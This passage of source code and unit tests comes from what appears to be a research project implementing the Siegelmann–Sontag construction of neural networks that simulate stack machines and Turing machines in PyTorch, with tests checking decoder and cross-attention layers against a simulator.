for i_nonempty in product(*self.p*[subs]):
# then get i_top
for i_top in self._generate_i_top(i_nonempty):
yield (*i_top, *i_nonempty)
def _generate_i_top(self, i_nonempty):
cands = [{None, j} for j in i_nonempty]
for j in product(*cands):
yield j
def convert_to_tensor_indices(self, i: Tuple[int]):
"""Map (i1, i2, i3, ...) to (i1, i2+4, i3+8, ...)
"""
offsets = range(0, 8*self.p, 4)
return tuple(a+b for a, b in zip(i, offsets) if a is not None)
class SiegelmannSontag4(Module):
"""Feedforward layers to
Notes
A layer used in
input x: s + p = len(states) + len(alphabet); we ignore the counter
Reference
SS95
"""
def __init__(self, s: int, p: int = 2):
super().__init__()
self.s = s
self.p = p
# F_4, linear state0
linear = Linear(s-1, s)
w = torch.zeros(s, s-1)
b = torch.zeros(s, )
# 0-state
w[0, :] = -1
b[0] = 1
w[1:, :] = torch.eye(s-1)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_state0 = linear
# F_4, linear top, zeta, a
linear = Linear(p, p)
w = 4 * torch.eye(p)
b = -2 * torch.ones(p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_top = linear
# F_4, linear nonempty, tau, b
linear = Linear(p, p)
w = 4 * torch.eye(p)
b = torch.zeros(p)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_nonempty = linear
# F_3, F_2
self.configuration_detector = ConfigurationDetector4(s, p)
d = s*3**p
self.beta = Linear(d, s, bias=False)
self.gamma = Linear(d, 4*p, bias=False)
eta = s+4*p
linear = Linear(s+3*p, eta)
w = torch.zeros(eta, s+3*p)
b = torch.zeros(eta,)
# b[:s] = 1
# substacks
stack_, top_ = s+2*p, s
k = 0
for i in range(p):
w[s+k+0, stack_+i] = 1
b[s+k+0] = 0
w[s+k+1, stack_+i] = 1/4
b[s+k+1] = 1/4
w[s+k+2, stack_+i] = 1/4
b[s+k+2] = 3/4
w[s+k+3, stack_+i] = 4
w[s+k+3, top_+i] = -2
b[s+k+3] = -1
k += 4
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_update = linear
# F_1
linear = Linear(eta, s-1+p)
w = torch.zeros(s-1+p, eta)
b = torch.zeros(s-1+p,)
w[:s-1, 1:s] = torch.eye(s-1)
for i in range(p):
w[s-1+i, s+4*i:s+4*i+4] = 1
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear_F_1 = linear
def forward(self, x: Tensor):
s, p = self.s, self.p
x_state, x_stack = x[:s-1], x[s-1:]
# F4
o = torch.cat([
self.linear_state0(x_state),
self.linear_top(x_stack),
self.linear_nonempty(x_stack),
x_stack])
o = saturated_relu(o)
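        # Added note (inferred from the push/pop weights defined in __init__, not
        # stated in the original source): each sub-stack value appears to use the
        # base-4 "Cantor" encoding of SS95, storing bits b_1 b_2 ... b_k (top
        # first) as q = sum_i (2*b_i + 1) / 4**i, which is what `decode` below
        # unwinds one bit at a time for debugging/printing.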
def decode(xx: float) -> str:
# top
if xx < 1e-8:
return ''
elif 4*xx-2 > 0:
# top is 1
return '1' + decode(4*xx-2-1)
else:
# top is 0
return '0' + decode(4*xx-1)
for w in o[s+2*p:s+3*p].detach():
print(w, decode(w.item()))
# F3, F2
u = self.configuration_detector(o[:s+2*p])
# print('beta, gamma', [self.beta(u), self.gamma(u)-1])
proj = torch.cat([self.beta(u), self.gamma(u)-1])
# self.gamma(self.configuration_detector(torch.Tensor((0,1,0,0,0,1,1,1))))
# print('update', self.linear_update(o))
o = proj + self.linear_update(o)
o = saturated_relu(o)
# print(o[:s], o[s:])
# F1
o = self.linear_F_1(o)
o = saturated_relu(o)
print()
return o
def fit(self, delta, z2i, states, alphabet, fallback_next_state_and_action=('F', 'noop', 'noop')):
"""
"""
y = self._generate_y(delta, z2i, states, alphabet, fallback_next_state_and_action)
x = self.configuration_detector.linear.weight.detach()
h = self.configuration_detector(x)
beta, gamma = self._solve_for_beta_and_gamma(h, y)
self.beta.weight = Parameter(beta)
self.gamma.weight = Parameter(gamma)
def _generate_y(self, delta, z2i, states, alphabet, fallback_next_state_and_action):
p, s = self.p, self.s
d = s * 3**p
y = torch.zeros(d, s+4*p)
for row, (v, z) in enumerate(self.configuration_detector.generate_v_z()):
key = self._get_key(v, z, states)
if key not in delta:
print(f'The transition from {key} is not specified. Using fallback.')
z_next, action_1, action_2 = delta.get(key, fallback_next_state_and_action)
y[row, z2i[z_next]] = 1
for k, action in enumerate([action_1, action_2]):
offset = self.map_action(action)
y[row, s+4*k+offset] = 1
return y
@staticmethod
def map_action(action: str):
if action == 'push 0':
offset = 1
elif action == 'push 1':
offset = 2
elif action == 'pop':
offset = 3
else:
# noop
offset = 0
return offset
def _get_key(self, v, z, states):
a_1, a_2, b_1, b_2 = v
return states[z], a_1 if b_1==1 else None, a_2 if b_2==1 else None
def _solve_for_beta_and_gamma(self, h, y):
"""TODO:
y = y[batch, :]
= cd(x[batch, :]) * C
= h * C
"""
s = self.s
C = torch.linalg.solve(h, y).detach().T
return C[:s,:], C[s:,:]
class ConfigurationDetector4(Module):
"""TODO:
= -1 + \sum_{j=1}^s \beta_j(a_1,...,a_p,b_1,...,b_p) x_j
= -1 + \sum_{j=1}^s \sum_{i=1}^{3^p} c_i \sigma(v_{i}{1} a_1 + ... + v_{i}{2p} b_p + x_j - const)
= C * \sigma (L * input + bias) - 1
where
input = (x,a,b) is (s+2p) x 1
C is 1 x s*3^p
L is s*3^p x (s+2p) =
| e_1' v |
| e_2' v |
| ... |
| e_s' v |
Note
L, bias are universal, hence constant
C is independent
Unlike the paper, we use s instead of s+1 states.
"""
def __init__(self, s: int, p: int):
super().__init__()
# number of states
self.s = s
# number of stacks
self.p = p
# network
d = s*3**p
w = torch.zeros(d, s+2*p)
b = torch.zeros(d,)
counter = 0
for v, z in self.generate_v_z():
w[counter, s:] = torch.Tensor(v)
# copy state
w[counter, z] = 1
# bias
b[counter] = -sum(v)
counter += 1
linear = Linear(s+2*p, d)
linear.weight = Parameter(w)
linear.bias = Parameter(b)
self.linear = linear
def forward(self, x):
return saturated_relu(self.linear(x))
def generate_v_z(self):
for v in self._generate_v():
for z in range(self.s):
yield v, z
def _generate_v(self):
for i in range(4**self.p):
coefs = self._get_row_of_v(i)
            if coefs is not None: yield coefs
def _get_row_of_v(self, i: int):
t = 2*self.p
coefs = tuple(map(int, f"{i:0{t}b}"))
# skip invalid case where top/peek is 1 and nonempty is 0
for i in range(self.p):
if coefs[i]==1 and coefs[i+self.p]==0:
return None
return coefs
```
#### File: test/wcm/helper.py
```python
import unittest
import torch
from turing.wcm.simulator import Simulator
class TestCase(unittest.TestCase):
def setUp(self) -> None:
self.tx = Simulator(T=17)
def assertTensorsEqual(self, expected, actual, msg=""):
if not torch.equal(expected, actual):
self.fail(f'Not equal: {msg}')
```
#### File: test/wcm/test_decoder.py
```python
import random
import torch
from test.wcm.helper import TestCase
from turing.wcm.networks import Transition, FullAdder, PreprocessForAdder
class TestDecoder(TestCase):
def test_decode_step(self):
tx = self.tx
l = 4
for i in random.choices(range(tx.T), k=20):
for (z, a), (z_next, u, q) in tx.delta.items():
o = Transition(tx.slices, tx.delta, tx.states, tx.alphabet, tx.z2i, tx.a2i)(tx.h(z, a, i, l))
o = PreprocessForAdder(tx.slices)(o)
for k in range(tx.w_pos-1, -1, -1):
o = FullAdder(d_in=tx.w+tx.w_pos, i=tx.pos3_+k, j=tx.w+k, k=tx.scr5_)(o)
self.assertTensorsEqual(tx.one_states(z_next), o[tx.st_:tx.sym1_], "st")
self.assertTensorsEqual(torch.zeros_like(o[tx.sym1_:tx.sym2_]), o[tx.sym1_:tx.sym2_], "sym1")
self.assertTensorsEqual(tx.one_alphabet(u), o[tx.sym2_:tx.pos1_], "sym2")
self.assertTensorsEqual(torch.Tensor(tx.Bin(i)), o[tx.pos1_:tx.pos2_], "pos1")
self.assertTensorsEqual(torch.Tensor(tx.Bin(l)), o[tx.pos2_:tx.pos3_], "pos2")
self.assertTensorsEqual(torch.Tensor(tx.Bin(l+q)), o[tx.pos3_:tx.scr1_], "pos3")
self.assertTensorsEqual(torch.Tensor([0, 1]) if q == 1 else torch.Tensor([1, 0]), o[tx.scr5_:tx.w], "scr5")
```
#### File: test/wcm/test_get_initial_symbol.py
```python
import random
import torch
from test.wcm.helper import TestCase
from turing.wcm.networks import GetInitialSymbol
class TestCrossAttention(TestCase):
def test_single_layer(self):
"""Claim C.7
"""
tx = self.tx
tape = "B(())E"
z = random.choice(tx.states)
u = random.choice(tx.alphabet)
i = random.choice(range(tx.T))
l_minus = random.choice(range(len(tape)))
l = random.choice(range(len(tape)))
iprime = 2
uprime = random.choice(tx.alphabet)
m = len(tape)
xl = tape[l]
f = GetInitialSymbol(tx.slices)
x, E = self.generate_input(tape, z, u, i, l_minus, l, iprime, uprime)
o = f(x, E)
o = o[-1, :]
self.assertTensorsEqual(tx.one_states(z), o[tx.st_:tx.sym1_], "st")
self.assertTensorsEqual(tx.one_alphabet(u), o[tx.sym2_:tx.pos1_], "sym2")
self.assertTensorsEqual(torch.Tensor(tx.Bin(i)), o[tx.pos1_:tx.pos2_], "pos1")
self.assertTensorsEqual(torch.Tensor(tx.Bin(l_minus)), o[tx.pos2_:tx.pos3_], "pos2")
self.assertTensorsEqual(torch.Tensor(tx.Bin(l)), o[tx.pos3_:tx.scr1_], "pos3")
if iprime == 0:
self.assertTensorsEqual(torch.zeros_like(o[tx.scr1_:tx.scr2_]), o[tx.scr1_:tx.scr2_], "scr1")
else:
self.assertTensorsEqual(tx.one_alphabet(uprime), o[tx.scr1_:tx.scr2_], "scr1")
if l > m:
self.assertTensorsEqual(torch.zeros_like(o[tx.scr2_:tx.scr3_]), o[tx.scr2_:tx.scr3_], "scr2")
else:
self.assertTensorsEqual(tx.one_alphabet(xl), o[tx.scr2_:tx.scr3_], "scr2")
if iprime == 0:
self.assertTensorsEqual(torch.tensor(0.), o[tx.scr4_], "scr4_1")
else:
self.assertTensorsEqual(torch.tensor(1.), o[tx.scr4_], "scr4_1")
if l > m:
self.assertTensorsEqual(torch.tensor(0.), o[tx.scr4_+1], "scr4_2")
else:
self.assertTensorsEqual(torch.tensor(1.), o[tx.scr4_+1], "scr4_2")
def generate_input(self, tape, z, u, i, l_minus, l, iprime, uprime):
tx = self.tx
# Encoder
E = tx.encode_tape(tape)
# Decoder input
x = torch.zeros(tx.w, )
x[tx.st_:tx.sym1_] = tx.one_states(z)
x[tx.sym2_:tx.pos1_] = tx.one_alphabet(u)
x[tx.pos1_:tx.pos2_] = torch.Tensor(tx.Bin(i))
x[tx.pos2_:tx.pos3_] = torch.Tensor(tx.Bin(l_minus))
x[tx.pos3_:tx.scr1_] = torch.Tensor(tx.Bin(l))
if iprime == 0:
x[tx.scr1_:tx.scr2_] = 0
x[tx.scr4_] = 0
else:
x[tx.scr1_:tx.scr2_] = tx.one_alphabet(uprime)
x[tx.scr4_] = 1
x = x.unsqueeze(0)
return x, E
```